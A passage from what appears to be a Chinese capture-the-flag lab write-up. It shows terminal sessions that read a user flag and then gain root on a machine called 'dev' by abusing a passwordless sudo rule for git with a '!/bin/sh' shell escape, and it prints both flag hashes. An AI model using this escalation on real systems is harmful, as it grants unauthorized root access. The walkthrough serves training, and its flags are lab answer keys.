Last login: Sun Sep 27 13:18:16 2020 from 192.168.145.10
f3dai@dev:~$ id
uid=1000(f3dai) gid=1000(f3dai) groups=1000(f3dai),4(adm),24(cdrom),30(dip),46(plugdev),120(lpadmin)f3dai@dev:~$ ls -alh
total 80K
drwxr-xr-x 16 f3dai f3dai 4.0K Sep 26 2020 .
drwxr-xr-x 3 root root 4.0K Sep 26 2020 ..
lrwxrwxrwx 1 f3dai f3dai 9 Sep 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 f3dai f3dai 220 Sep 26 2020 .bash_logout
-rw-r--r-- 1 f3dai f3dai 3.7K Sep 26 2020 .bashrc
drwx------ 12 f3dai f3dai 4.0K Sep 26 2020 .cache
drwxr-xr-x 11 f3dai f3dai 4.0K Sep 26 2020 .config
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Desktop
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Documents
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Downloads
drwx------ 3 f3dai f3dai 4.0K Sep 26 2020 .gnupg
drwxr-xr-x 3 f3dai f3dai 4.0K Sep 26 2020 .local
drwx------ 5 f3dai f3dai 4.0K Sep 26 2020 .mozilla
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Music
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Pictures
-rw-r--r-- 1 f3dai f3dai 807 Sep 26 2020 .profile
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Public
drwx------ 2 f3dai f3dai 4.0K Sep 26 2020 .ssh
-rw-r--r-- 1 f3dai f3dai 0 Sep 26 2020 .sudo_as_admin_successful
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Templates
-rw-rw-r-- 1 f3dai f3dai 33 Sep 26 2020 user.txt
drwxr-xr-x 2 f3dai f3dai 4.0K Sep 26 2020 Videos
f3dai@dev:~$ cat user.txt
9f348b50811eec6d89d7213ec6cb4c38
f3dai@dev:~$
,131(lxd),132(sambashare)
这样就拿到了用户Flag.
提权
f3dai@dev:~$ sudo -l
Matching Defaults entries for f3dai on dev:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User f3dai may run the following commands on dev:
(root) NOPASSWD: /usr/bin/git
f3dai@dev:~$
可以利用git命令进行提权,参考GTFOBINS网站提供的方法进行提权。
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 32K
drwx------ 4 root root 4.0K Sep 26 2020 .
drwxr-xr-x 20 root root 4.0K Sep 26 2020 ..
lrwxrwxrwx 1 root root 9 Sep 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwx------ 2 root root 4.0K Jul 31 2020 .cache
-rw------- 1 root root 54 Sep 26 2020 .lesshst
drwxr-xr-x 3 root root 4.0K Sep 26 2020 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 33 Sep 26 2020 root.txt
# cat root.txt
37c24213df088bb485e97b7ce1929e09
这样就成功拿到了Root Flag。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
